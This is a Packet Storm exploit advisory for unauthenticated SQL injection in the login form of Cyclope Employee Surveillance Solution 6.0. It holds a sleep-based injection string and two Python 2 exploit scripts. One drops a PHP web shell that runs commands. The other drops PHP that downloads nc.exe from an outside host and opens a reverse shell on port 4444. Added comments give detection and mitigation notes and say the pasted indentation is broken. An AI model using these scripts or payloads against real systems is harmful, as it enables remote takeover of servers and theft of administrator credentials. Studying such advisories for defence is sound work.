Cyclope Employee Surveillance Solution 6.0 SQL Injection

2012-08-09T00:00:00
ID PACKETSTORM:115406
Type packetstorm
Reporter loneferret
Modified 2012-08-09T00:00:00

Description

                                        
# Author: loneferret of Offensive Security
# Product: Cyclope Employee Surveillance Solution v6.0  
# Version: 6.0  
# Vendor Site: http://www.cyclope-series.com/  
# Software Download: http://www.cyclope-series.com/download/index.html  
  
# Software description:  
# The employee monitoring software developed by Cyclope-Series is specially designed to inform  
# and equip management with statistics relating to the productivity of staff within their organization.  
  
# Vulnerability:  
# Due to improper input sanitization, many parameters are prone to SQL injection.
# Most importantly, the username parameter in the application's login form.  
#  
  
  
  
# PoC 1:  
# MySql sleep for 5 seconds.  
# No Authentication Required.  
# Page: /index.php  
# Form: login  
# Vulnerable Parameter: username  
# username: x' or sleep(5) and '1'='1  
# password: whatever  
  
# As stated, nothing is checked before passing "username" to MySql.  
# This results in MySql sleeping for 5 seconds, and an unsuccessful
# attempt.
  
# PoC 2:  
# Remote Code Execution  
# No Authentication Required.  
# Page: /index.php  
# Form: login  
# Vulnerable Parameter: username  
  
# Creates a small php shell in the application's root folder.  
# It also has the added bonus of writing the administrator username and password  
# Side note:  
# This assumes a default installation. Which is located in "C:\Program Files\Cyclope\Ni4xLjA=\"  
# If you are wondering what is "Ni4xLjA=", well it's the software's version number in Base64 (6.1.0).  
# Using Owasp Zap, you can spider the site to find the application's root folder if ever it changes.  
  
----Python Script Simple Backdoor----  
#!/usr/bin/python
# NOTE(review): Python 2 script exactly as published (print statements, urllib/urllib2/
# cookielib). The indented bodies below (the argv check, the try/except) are flush-left in
# the published text, so as pasted this does not parse; indentation was presumably lost in
# transcription. Code kept verbatim, comments only.

import urllib, cookielib
import urllib2
import sys


print "\n[*] Cyclope Employee Surveillance Solution v6.0 Remote Code Execution"
print "[*] Vulnerability discovered by loneferret"

print "[*] Offensive Security - http://www.offensive-security.com\n"
# Expects exactly two positional arguments: the target host and a command string.
if (len(sys.argv) != 3):
print "[*] Usage: poc.py <RHOST> <CMD>"
print "[*] Ex. : poc.py 127.0.0.1 ipconfig"
exit(0)

rhost = sys.argv[1]
rcmd = sys.argv[2]

# PHP that is written to disk: runs whatever arrives in the 'exe' query parameter.
backdoor = "<?php system($_GET['exe']);?>"

# Value sent as the login form's "username" field. Per the advisory text above it is
# concatenated unsanitized into a MySQL query; the injected SELECT ... INTO OUTFILE writes
# the PHP above to the default install path under the web root.
# Server-side mitigation: a parameterized query for the login lookup, a database account
# without the FILE privilege, and a web root the database service account cannot write to.
prepayload = "x' or (SELECT 0x20 into outfile '/Progra~1/Cyclope/Ni4xLjA=/cmd.php' "
prepayload += "LINES TERMINATED BY 0x%s) and '1'='1" % backdoor.encode('hex')

act = 'auth-login'
pag = 'login'
password = 'hole'

# Cookie-aware opener; the login POST goes to the application on port 7879.
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
post_params = urllib.urlencode({'act' : act, 'pag' : pag, 'username' : prepayload, 'password' : password})
print "[*] Sending evil payload"
resp = opener.open("http://%s:7879/" % rhost, post_params)
print "[*] Triggering backdoor"
# First GET of the dropped file carries no 'exe' parameter; its response is discarded.
cmd = 'http://%s:7879/Ni4xLjA=/cmd.php' % rhost
page = urllib.urlopen(cmd)
print "[*] Executing command: %s\n" % rcmd
shell = 'http://%s:7879/Ni4xLjA=/cmd.php?exe=%s' % (rhost,rcmd)
# Detection note: the observable artefacts of this sequence in web-server logs are a login
# POST whose username contains SQL keywords, followed by requests for /Ni4xLjA=/cmd.php
# (a file this script creates) with an 'exe' query parameter.
try:
page = urllib.urlopen(shell)
cmd = page.read()
print cmd
except:
# Bare except: swallows every error (including KeyboardInterrupt) and prints no detail.
print "[-] Oups! Somthing happened"
  
  
  
  
---Python Getting Shell---  
#!/usr/bin/python
# NOTE(review): Python 2 script exactly as published; same injection as the first script,
# with a different PHP payload. The argv-check and try bodies are flush-left in the
# published text and do not parse as pasted (indentation presumably lost in transcription).
# Code kept verbatim, comments only.

import urllib, cookielib
import urllib2
import sys


print "\n[*] Cyclope Employee Surveillance Solution v6.0 Remote Code Execution"
print "[*] Vulnerability discovered by loneferret"

print "[*] Offensive Security - http://www.offensive-security.com\n"
# Expects exactly one positional argument: the target host.
if (len(sys.argv) != 2):
print "[*] Usage: poc.py <RHOST>"
exit(0)

rhost = sys.argv[1]

# PHP that is written to disk: downloads a binary from a hard-coded address into the PHP
# process's working directory and launches it with a connection back to that address on
# TCP 4444. 172.16.194.163 is a private (RFC 1918) address, presumably the author's lab
# host; it is not taken from the command line.
# Detection note: an outbound connection from the application server to an internal host
# on TCP 4444, and a file named nc.exe appearing on the server, are the host/network
# artefacts of this payload, in addition to the web-log artefacts of the injection itself.
backdoor = '''<?php
file_put_contents("nc.exe",
file_get_contents("http://172.16.194.163/nc.exe"));
shell_exec("nc.exe 172.16.194.163 4444 -e cmd.exe");?>'''

# Value sent as the login form's "username" field; concatenated unsanitized into a MySQL
# query server-side, where the injected SELECT ... INTO OUTFILE writes the PHP above to the
# default install path under the web root.
# Server-side mitigation: a parameterized query for the login lookup, a database account
# without the FILE privilege, and a web root the database service account cannot write to.
prepayload = "x' or (SELECT 0x20 into outfile '/Progra~1/Cyclope/Ni4xLjA=/cmd.php' "
prepayload += "LINES TERMINATED BY 0x%s) and '1'='1" % backdoor.encode('hex')

act = 'auth-login'
pag = 'login'
password = 'hole'

# Cookie-aware opener; the login POST goes to the application on port 7879.
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
post_params = urllib.urlencode({'act' : act, 'pag' : pag, 'username' : prepayload, 'password' : password})
print "[*] Sending evil payload"
try:
resp = opener.open("http://%s:7879/" % rhost, post_params)
print "[*] Triggering Shell"
# A single GET of the dropped file runs the PHP; the response body is read but never printed.
shell = 'http://%s:7879/Ni4xLjA=/cmd.php' % rhost
page = urllib.urlopen(shell)
cmd = page.read()
except:
# Bare except: swallows every error (including KeyboardInterrupt) and prints no detail.
print "[-] Oups! Somthing happened"
  
  